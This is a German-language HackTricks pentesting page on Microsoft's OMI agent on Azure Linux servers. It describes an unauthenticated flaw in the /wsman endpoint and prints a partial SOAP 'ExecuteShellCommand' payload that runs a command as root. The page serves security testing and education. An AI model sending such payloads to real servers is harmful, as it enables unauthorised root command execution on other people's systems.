5985,5986 - Pentesting OMI

Support HackTricks

Grundinformationen

OMI wird als Open-Source-Tool von Microsoft präsentiert, das für das Remote-Konfigurationsmanagement entwickelt wurde. Es ist besonders relevant für Linux-Server auf Azure, die Dienste wie folgende nutzen:

  • Azure Automation

  • Azure Automatic Update

  • Azure Operations Management Suite

  • Azure Log Analytics

  • Azure Configuration Management

  • Azure Diagnostics

Der Prozess omiengine wird gestartet und lauscht auf allen Schnittstellen als Root, wenn diese Dienste aktiviert sind.

Standardports, die verwendet werden, sind 5985 (http) und 5986 (https).

Wie am 16. September beobachtet, sind Linux-Server, die in Azure mit den genannten Diensten bereitgestellt werden, aufgrund einer verwundbaren Version von OMI anfällig. Diese Verwundbarkeit liegt im Umgang des OMI-Servers mit Nachrichten über den /wsman-Endpunkt, ohne dass ein Authentifizierungsheader erforderlich ist, was den Client fälschlicherweise autorisiert.

Ein Angreifer kann dies ausnutzen, indem er eine "ExecuteShellCommand" SOAP-Nutzlast ohne Authentifizierungsheader sendet, wodurch der Server gezwungen wird, Befehle mit Root-Rechten auszuführen.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Für weitere Informationen zu diesem CVE hier überprüfen.

Referenzen

Unterstützen Sie HackTricks

Last updated